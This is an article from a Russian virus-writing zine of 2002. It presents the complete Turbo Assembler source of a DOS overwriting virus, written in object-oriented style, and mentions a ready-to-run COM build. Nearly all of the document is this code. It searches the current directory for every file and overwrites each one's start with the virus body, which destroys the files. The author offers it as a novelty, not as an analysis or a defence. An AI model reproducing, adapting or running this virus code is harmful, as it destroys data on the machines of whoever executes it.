╔═════════════════════════════════════════════════════════════════════════════╗
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
║░█████▌░█████▌░░░░░█▌░░░░░████████▌░░░█████▌██████████▌░░░░░█▌░░░░░█████████░║
║░░███▌░░░███▌░░░░░███▌░░░░░██▌░░████▌░░███▌░██▌░██▌░██▌░░░░███▌░░░░█▌░██▌░██░║
║░░██▌░░░░██▌░░░░░░███▌░░░░░██▌░░░░██▌░░░██▌░█▌░░██▌░░█▌░░░░███▌░░░░▌░░██▌░░█░║
║░░██▌░░░░██▌░░░░░█████▌░░░░██▌░░░░██▌░░░██▌░░░░░██▌░░░░░░░█████▌░░░░░░██▌░░░░║
║░░█████████▌░░░░██▌░██▌░░░░█████████▌░░░██▌░░░░░██▌░░░░░░██▌░██▌░░░░░░██▌░░░░║
║░░██▌░░░░██▌░░░░███████▌░░░██▌░░░░███▌░░██▌░░░░░██▌░░░░░░███████▌░░░░░██▌░░░░║
║░░██▌░░░░██▌░░░██▌░░░███▌░░██▌░░░░░██▌░░██▌░░░░░██▌░░░░░██▌░░░███▌░░░░██▌░░░░║
║░░██▌░░░░██▌░░██▌░░░░░██▌░░██▌░░░░███▌░░██▌░░░░░██▌░░░░██▌░░░░░██▌░░░░██▌░░░░║
║░█████▌░████▌████▌░░░████▌█████████▌░░█████▌░░░████▌░░████▌░░░████▌░░█████▌░░║
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░  issue#2 apr.2002  ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
╚═════════════════════════════════════════════════════════════════════════════╝

  --< Обьектно ориентированное программирование меняет ориентацию! >--

 ┌──────────────────────────────────────┐
 │ Имя продукта  : COCKSUCKER           │
 │ Язык исходника: Turbo Assembler 5.0  │
 │ Дата          : 05.12.2001           │
 │ Автор         : Alchemist            │
 └──────────────────────────────────────┘

 Предлагаю вашему вниманию ещё один overwriter. Основное его отличие
 заключается в том, что он написан с применением ООП. Да, да вы не ослышались
 это, вероятно, первый обьектно ориентированный вирус на ассемблере. Написан
 в лучших традициях ООП, есть даже наследование обьектов ;)
 По сути, это самый примитивный оверврайтер, пишется во всё что попадётся.
 Вот исходник:
 А если вам лень его ассемблировать запустите готовый com файл в архиве.

=======< cut here >=======
;----------------------------------------;
;                                        ;
;      ==  THE COCKSUCKER VIRUS  ==      ;
;                                        ;
;----------------------------------------;

 IDEAL

 JUMPS

 LOCALS @@

 MODEL TINY,PASCAL
 ;-------------------------------------------------------------------;
 ;-------- Базовый обьект TBase -------------------------------------;
 ;-------------------------------------------------------------------;
 STRUC  TBase METHOD {
        Terminate = TBase_Terminate      ; Прерывание программы по 4Ch ;
        OpenF     = TBase_OpenF          ; Открыть файл                ;
        WriteF    = TBase_WriteF         ; Писать в файл               ;
        CloseF    = TBase_CloseF         ; Закрыть файл                ;
                                }

 ENDS   TBase

 ;-------------------------------------------------------------------;
 ;-------- Обьект TInfector наследует все методы TBase --------------;
 ;-------------------------------------------------------------------;
 STRUC  TInfector TBase  METHOD {
        InfectF   = TInfector_InfectF       ; Заразить файл          ;
                                }
 ENDS   TInfector

 ;-------------------------------------------------------------------;
 ;-------- Обьект TSearchEngine - процедуры для поиска жертв в curdir;
 ;-------------------------------------------------------------------;

 STRUC  TSearchEngine METHOD {
        SetDTA    = TSearchEngine_SetDTA    ; Установить буфер DTA
        FindFirst = TSearchEngine_FindFirst ; Поиск первого вхождения
        FindNext  = TSearchEngine_FindNext  ; Поиск последующих вхождений
                             }
 ENDS   TSearchEngine



 CODESEG

 ORG 100h
;-------------------------; Основная программа ;--------------------------
start_virus:


      mov  si,offset SearchEngine           ; Загружаем адрес обьекта в si
      call si METHOD TSearchEngine:SetDTA   ; Вызываем метод SetDTA
                                            ; т.е. устанавливаем буфер DTA
      mov  si,offset SearchEngine           ; Загружаем SearchEngine в si
      call si METHOD TSearchEngine:FindFirst; Вызываем FindFirst метод
      jc   Quit                             ; если нет файлов выходим
DIR:                                        ; ----------------------------
      mov  si,offset SearchEngine           ; Загружаем в si SearchEngine
      call si METHOD TSearchEngine:FindNext ; Вызываем метод FindNext
      jc   Quit ; Идём искать другие файлы  ; если нет файлов выходим
                                            ; ----------------------------
      mov  si,offset Infector               ; Здесь происходит заражение
      call si METHOD TInfector:InfectF      ; Вызываем метод Infect -
      jmp  dir                              ; т.е записать в начало файла
                                            ; тело вируса.
quit:                                       ; ----------------------------
      mov  si,offset Infector               ; Завершаем программу функцией
      call si METHOD TInfector:Terminate, 00h; 4Ch

;---------------------------; Методы обьектов ;---------------------------

;--------------------------------------------------------;
; TBase_Terminate - Прерывание программы с кодом выхода. ;
;--------------------------------------------------------;
 PROC TBase_Terminate
      ARG @@haltcode:byte
      mov  al,[@@haltcode]                  ; Помещаем haltcode в al
      mov  ah,4Ch                           ; номер функции
      int  21h                              ; завершаем программу
      ret
 ENDP TBase_Terminate
;--------------------------------------------------------;
; TBase_OpenF - Открыть файл.                            ;
;--------------------------------------------------------;
 PROC TBase_OpenF
      mov  al,2
      mov  ah,3Dh
      xor  cx,cx
      int  21h
      xchg ax,bx                            ; Дескриптор в bx
      ret
 ENDP TBase_OpenF
;--------------------------------------------------------;
; TBase_WriteF - Писать в файл.                          ;
;--------------------------------------------------------;
 PROC TBase_WriteF
      ARG @@count:word
      mov  ah,40h
      mov  cx,[@@count]                     ; Количество байт для записи
      int  21h
      ret
 ENDP TBase_WriteF

;--------------------------------------------------------;
; TBase_CloseF - Закрыть файл.                           ;
;--------------------------------------------------------;
 PROC TBase_CloseF
      mov  ah,3Eh
      int  21h
      ret
 ENDP TBase_CloseF

;--------------------------------------------------------;
; TInfector_InfectF - Заразить файл.                     ;
;--------------------------------------------------------;
 PROC TInfector_InfectF
; Пишем в файл с именем указанным в DTA по смещению 30
     lea  dx,[DTA+1Eh]
     mov  si,offset Infector
     call si METHOD TInfector:OpenF         ; Открываем файл

     lea  dx,[start_virus]                  ; Пишем
     mov  si,offset Infector
     call si METHOD TInfector:WriteF,(end_virus-start_virus)

     mov  si,offset Infector                ; Закрываем
     call si METHOD TInfector:CloseF

      ret
 ENDP TInfector_InfectF
;--------------------------------------------------------;
; TSearchEngine_SetDTA - Установить DTA.                 ;
;--------------------------------------------------------;
PROC  TSearchEngine_SetDTA
      mov  ah,1Ah
      lea  dx,[DTA]
      int  21h
      ret
ENDP  TSearchEngine_SetDTA
;--------------------------------------------------------;
; TSearchEngine_FindFirst - Найти первый.                ;
;--------------------------------------------------------;
PROC  TSearchEngine_FindFirst
      lea  dx,[FPath]
      mov  ah,4Eh
      mov  cx,110101b                       ; Атрибут - всё кроме read-only
      int  21h
      ret
ENDP  TSearchEngine_FindFirst
;--------------------------------------------------------;
; TSearchEngine_FindNext - Найти дальше.                 ;
;--------------------------------------------------------;
PROC  TSearchEngine_FindNext
      lea  dx,[DTA]
      mov  ah,4Fh
      int  21h
      ret
ENDP  TSearchEngine_FindNext

;--------------------------------------------------------;
; Данные Программы                                       ;
;--------------------------------------------------------;
      SearchEngine TSearchEngine <>     ; Обьект SearchEngine
      Infector TInfector <>             ; Обьект Infector

      FPATH   db      '*.*',0           ; .......................
end_virus:
dta     db      50 dup(?)

END start_virus
=======< cut here >=======



  --< ... >--